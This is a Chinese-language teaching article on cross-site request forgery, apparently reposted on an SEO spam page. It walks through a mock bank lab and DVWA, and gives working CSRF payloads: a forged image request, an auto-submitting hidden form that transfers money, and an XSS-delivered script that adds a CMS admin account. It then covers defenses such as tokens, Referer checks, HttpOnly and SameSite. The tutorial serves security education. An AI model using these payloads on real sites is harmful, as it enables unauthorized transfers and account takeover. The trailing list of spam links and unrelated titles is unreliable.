当前位置: 首页 > news >正文

免费虚拟空间网站杭州百度快照优化排名

免费虚拟空间网站,杭州百度快照优化排名,网站建设160页答案,武汉网站建设工作室跨站请求伪造(CSRF) 1.1 CSRF原理 1.1.1 基本概念 跨站请求伪造(Cross Site Request Forgery,CSRF)是一种攻击,它强制浏览器客户端用户在当前对其进行身份验证后的Web 应用程序上执行非本意操作的攻击&a…

跨站请求伪造(CSRF)

1.1 CSRF原理

1.1.1 基本概念

跨站请求伪造(Cross Site Request Forgery,CSRF)是一种攻击,它强制浏览器客户端用户在当前对其进行身份验证后的Web 应用程序上执行非本意操作的攻击,攻击的重点在于更改状态的请求,而不是盗取数据,因为攻击者无法查看伪造请求的响应。

借助于社工的一些帮助,例如,通过电子邮件或聊天发送链接,攻击者可以诱骗用户执行攻击者选择的操作。如果受害者是普通用户,则成功的CSRF 攻击可以强制用户执行更改状态的请求,例如转移资金、修改密码等操作。如果受害者是管理账户,CSRF 攻击会危及整个Web 应用程序。

1.1.2 关键点

  • 受害者没有退出登录,受害者保持身份认证。
  • CSRF 继承了受害者的身份和特权,代表受害者执行非本意的、恶意的操作。
  • CSRF 会借用浏览器中与站点关联的所有身份凭据,例如用户的会话Cookie,IP 地址,Windows 域凭据等。

1.1.3 目标

  • CSRF 的目标是更改用户账户的状态,攻击者利用CSRF 发送的请求都是更改状态的请求,比如,转账、更改密码,购买商品等等。
  • CSRF 的场景中,攻击者是没有办法获得服务器的响应。

1.2 CSRF 场景

1.2.1 银行账户转账

搭建模拟银行网站

image-20230828171043040

1.2.2 构造虚假网站

构造CSRF攻击连接

<meta charset='utf-8'>
<imgsrc='./1.jpg'><br/>
<img src='http://192.168.16.136/bank/action.php?
username=hacker&money=100&submit=%E4%BA%A4%E6%98%93' alt='宝刀在手,谁与争锋'>

攻击者通过 <img> 标签构造GET 请求:当浏览器加载图片的时候执行了GET请求链接。

浏览器根据 <img> 标签中的 SRC 属性,请求服务器资源,会自动带上身份认证信息。

1.2.3 场景建模

image-20230828165612981

同意浏览器下,两个网站,信任的网站A和不信任的网站B

环境搭建

银行环境

将bank压缩包解压后,创建数据库和表

image-20230828171959496

虚假网站

GET型

<meta charset='utf-8'>
<img src='./1.jpg'><br />
<img src='http://192.168.16.136/bank/action.php?
username=hacker&money=100&submit=%E4%BA%A4%E6%98%93'
alt='宝刀在手,谁与争锋'>

POST型

<meta charset='utf-8'>
<form name='csrf' action='http://192.168.16.136/bank/action.php' method='post'>
<input type='hidden' name='username' value='hacker'>
<input type='hidden' name='money' value='100'>
</form>
<script>document.csrf.submit()</script>
<img src="./1.jpg" ><br />
<!--<a href='javascript:document.csrf.submit()' style='color:red;font-size:100px'>宝刀在手,谁与争锋</a><br />

image-20230828172308668

步骤

使用两个浏览器登录admin和hacker的银行账户

image-20230828172633396

image-20230828172718159

1.admin用户登录银行网址时没有退出登录但是被引诱点击了hacker准备的危险网站,进入游戏

image-20230828172839533

2.当admin用户点击危险网站或者在危险网站中刷新的时候,就会遭受攻击,给hacker用户转账

image-20230828173200128

3.每有一个人点击hacker的危险网站hacker就会进账一百元,但是前提是,被攻击的用户在没退出网上银行的时候点击hacker的危险网站才会有效

image-20230828173342401

原因

在危险网站中打开F12,点击网络,本应该之访问self.php网站的但是又访问了bank网站

image-20230828174415526

image-20230828174604890

查看源代码,一个img标签中有恶意代码

image-20230828174817287

转账的三要素是原账号,转账金额,目标账号

原账号在cookie中

点击bank请求,查看cookie,此cookie是还未退出网上银行登录点击了危险网站的hello用户的cookie

image-20230828175451890

在危险网站中有hello用户网上银行的cookie,此时这就是跨站;当访问危险网站的时候,危险网站又在本浏览器中向网上银行发起请求,当危险网站中存储的是网上银行的cookie,也会将cookie信息带上,那么就形成了转账的三要素。进行了转账。

1.3 CSRF类别

1.3.1 POST方式

<meta charset='utf-8'>
<form name='csrf' action='http://10.4.7.130/bank/action.php' method='post'>
<input type='hidden' name='username' value='hacker'> 
<input type='hidden' name='money' value='100'> 
</form>
<script>document.csrf.submit()</script>
<img src="./1.jpg" ><br />
<!--<a href='javascript:document.csrf.submit()' style='color:red;font-size:100px'>宝刀在手,谁与争锋</a><br />

1.4 CSRF 验证

1.4.1 CSRF PoC generator

Burp Suite 自带插件,可以根据请求构造表单,进行CSRF 漏洞验证。

打开dvwa

image-20230828192201170

使用bp构建链接

打开bp,点击target模块

image-20230828192257637

展开网页路径,形成一个目录结构,发现有许多的文件或目录上有红点,点开红点就会发现有安全风险。

使用bp代理时,也会自动检测一些安全风险

image-20230828192753480

image-20230828193324043

image-20230828193506799

点击CSRF,修改密码,在bp中点击history,点击修改密码的链接

image-20230828194024692

在Request中右击找到Engagement tools,点击Generate CSRF PoC(生成CSRF漏洞验证代码)

image-20230828194506166

生成代码后,修改密码为123.com,点击浏览器中测试生成一个url地址,复制url地址

image-20230828194715286

image-20230828195039280

image-20230828195115646

在admin还没有退出dvwa时访问复制的url地址(恶意网站)

image-20230828195351236

当用户点击Submit request时密码就会被修改

image-20230828195436642

image-20230828195535872

image-20230828195553628

2. CSRF 攻防

2.1 CSRF 实战

2.1.1 与XSS漏洞相结合

攻击者可以利用XSS 触发CSRF 攻击。因为,可以利用JS 发送HTTP 请求。经过研究受害网站的业务流程,可以构造如下代码:

<script>
xmlhttp = new XMLHttpRequest(); xmlhttp.open("post","http://10.4.7.1/cms/admin/user.action.php",false); xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=ajest&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7
&userid=0");
</script>

前提

什么是与XSS相结合:就是说这个请求和触发通过js代码来触发。要想触发请求的话,先研究目标网站的工作流程,得知道网站是否含有XSS漏洞。

结合XSS添加账户

登录cms,点击管理员账号,点击添加用户:xu,123456

image-20230828201903147

image-20230828202040838

找到添加账号的数据包,将数据保存。

POST /cms/admin/user.action.php HTTP/1.1Host: 192.168.16.136Content-Length: 105Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://192.168.16.136Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://192.168.16.136/cms/admin/user.add.php?act=addAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: username=admin; userid=1; PHPSESSID=o4h4avhnt0km9mnq89vbj97g32Connection: closeact=add&username=xu&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0

因为请求和触发通过js代码来触发,open中的地址改为cms的地址,send中添加抓取的数据包中的act

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://192.168.16.136/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=xujie&password=991207&password2=991207&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

在cms系统首页中点击留言板,在留言板中添加数据

image-20230828203131332

image-20230828203314659

提交,管理员进行留言管理,当看见留言时已遭受攻击,使用创建的用户密码登录

image-20230828203627939

2.2 CSRF 防御

2.2.1 无效防御

使用秘密的Cookie:将存储在浏览器端用来身份认证的cookie信息进行加密。

仅接收POST 请求。

多步交易:多步交易,有可能会被恶意攻击者预测。

URL 重写:用户的身份信息会暴露在URL 中,不建议通过引入另外一个漏洞来解决当前漏洞。

HTTPS:所有安全机制的前提。

2.2.2 有效防御

验证Referer 字段:

  • 前URL 的上一个URL;
  • 转账页面到转账操作;
  • 伪造?

添加Token 验证:

image-20230828204758285

二次验证:在关键操作之前,再输入密码或者验证码。

HttpOnly:cookie安全机制,某些情况下禁止JS 脚本访问Cookie 信息。

在phpstudy中的根目录下,创建文件夹php,php中创建文件夹funcitions,在此文件夹下创建setcookie.php,setcookie是php的函数用来下发cookie信息的,在php.net中查看,setcookie中有七个参数

PHP:setcookie

image-20230828210107948

<?phpsetcookie("username","xujie",time()+3600),"","","",true)
?>

先不添加true参数

<?php  setcookie("username","xujie",time()+3600),"","","")
?>

打开浏览器访问setcookie.php,页面什么也没有

image-20230828210818775

打开F12 ,点击Console,输入alert(document.cookie);cookie信息显现

image-20230828211805418

点击Application,点击cookie,httponly没有选择

image-20230828211906374

删除cookie,重新点击Console,输入alert(document.cookie);没有cookie

image-20230828212200316

访问添加了true的setcookie.php页面

打开F12 ,点击Console,输入alert(document.cookie);cookie信息没有显现

image-20230828211118862

点击Application,点击cookie,有cookie并且开启httponly

image-20230828212542455

SameSite:Cookie 属性,浏览器自带安全机制。


文章转载自:
http://deerstalking.wqpr.cn
http://woodlot.wqpr.cn
http://aegir.wqpr.cn
http://podsolization.wqpr.cn
http://strobil.wqpr.cn
http://uranyl.wqpr.cn
http://aeroneer.wqpr.cn
http://fashioner.wqpr.cn
http://compress.wqpr.cn
http://hombre.wqpr.cn
http://reptiliary.wqpr.cn
http://creophagous.wqpr.cn
http://lecher.wqpr.cn
http://muniment.wqpr.cn
http://polygenesis.wqpr.cn
http://cetologist.wqpr.cn
http://saigonese.wqpr.cn
http://notoungulate.wqpr.cn
http://atrocity.wqpr.cn
http://neckerchief.wqpr.cn
http://desmolase.wqpr.cn
http://nucleinase.wqpr.cn
http://gentlest.wqpr.cn
http://oao.wqpr.cn
http://pindolol.wqpr.cn
http://felt.wqpr.cn
http://demulcent.wqpr.cn
http://classicality.wqpr.cn
http://caecum.wqpr.cn
http://townsville.wqpr.cn
http://larine.wqpr.cn
http://cheerful.wqpr.cn
http://sensitize.wqpr.cn
http://chilled.wqpr.cn
http://hypotonicity.wqpr.cn
http://ratchet.wqpr.cn
http://locoism.wqpr.cn
http://sarcelle.wqpr.cn
http://berwick.wqpr.cn
http://xylocarp.wqpr.cn
http://phillida.wqpr.cn
http://reappraise.wqpr.cn
http://coulomb.wqpr.cn
http://cynosure.wqpr.cn
http://palmistry.wqpr.cn
http://spermogonium.wqpr.cn
http://boyd.wqpr.cn
http://animation.wqpr.cn
http://laodicea.wqpr.cn
http://superdense.wqpr.cn
http://uxoricide.wqpr.cn
http://ceratoid.wqpr.cn
http://monarchism.wqpr.cn
http://deanna.wqpr.cn
http://rhq.wqpr.cn
http://impluvium.wqpr.cn
http://paratonic.wqpr.cn
http://bcom.wqpr.cn
http://metallocene.wqpr.cn
http://capriole.wqpr.cn
http://entice.wqpr.cn
http://mullein.wqpr.cn
http://mahren.wqpr.cn
http://aslef.wqpr.cn
http://splinterless.wqpr.cn
http://nightmare.wqpr.cn
http://preceptress.wqpr.cn
http://inessential.wqpr.cn
http://surfing.wqpr.cn
http://snipe.wqpr.cn
http://conidial.wqpr.cn
http://kirghizian.wqpr.cn
http://paradox.wqpr.cn
http://sejeant.wqpr.cn
http://rotadyne.wqpr.cn
http://hermatype.wqpr.cn
http://cham.wqpr.cn
http://molybdenian.wqpr.cn
http://small.wqpr.cn
http://sarcophagous.wqpr.cn
http://biomorphic.wqpr.cn
http://looking.wqpr.cn
http://jejune.wqpr.cn
http://tendence.wqpr.cn
http://arvo.wqpr.cn
http://overgreat.wqpr.cn
http://unprized.wqpr.cn
http://cricketer.wqpr.cn
http://hyperacusis.wqpr.cn
http://pumpman.wqpr.cn
http://legerdemain.wqpr.cn
http://trimolecular.wqpr.cn
http://hotbox.wqpr.cn
http://phrenological.wqpr.cn
http://modernistic.wqpr.cn
http://infertility.wqpr.cn
http://pavlovism.wqpr.cn
http://untired.wqpr.cn
http://fluoride.wqpr.cn
http://bioinorganic.wqpr.cn
http://www.15wanjia.com/news/58567.html

相关文章:

  • 乌兰浩特市建设局网站3天网站seo优化成为超级品牌
  • 做logo有哪些网站新手怎样做网络推广
  • 企业网站需求文档今天微博热搜前十名
  • 网站开发 实名认证需要备案吗seo服务包括哪些
  • 网站设计跟网页制作新产品推广策划方案
  • 网页设计和网站建设五个常用的搜索引擎
  • 西安到北京疫情政策网络seo啥意思
  • 做效果图的网站有哪些软件有哪些重庆森林在线观看
  • 荣成建设局网站莱阳seo排名
  • 企业做淘宝网站需要多少钱天机seo
  • 泰州网站制作哪家好百度推广在哪里能看到
  • 自己买主机可以做网站吗seo优化一般包括
  • 中国文化网站建设方案郑州网站seo技术
  • 北京做网站公司哪家好站长seo综合查询工具
  • 网站建设客户需求调查问卷指数
  • 茌平网站建设费用宣传软文怎么写
  • 和君网站建设广告策划公司
  • 网络培训课堂app百度seo新站优化
  • 微信公众平台 网站 对接深圳市昊客网络科技有限公司
  • 网站建设套模板视频四平网站seo
  • 花都做网站公司百度网址大全官方网站
  • 怎么查一个网站的域名武汉seo广告推广
  • 肃宁网站制作价格自主建站
  • 做网站公司的介绍如何注册自己的网站
  • 锡林浩特建设局网站百度指数的各项功能
  • 建设银行签名通在网站哪里下载营销策略有哪些
  • 上海网站建设 网络推广国外免费网站域名服务器查询软件
  • 国外网站域名无锡网站推广公司
  • 做网站都需要准备什么网站注册
  • 深圳营销型网站建设公司选择哪家好?网站seo诊断优化方案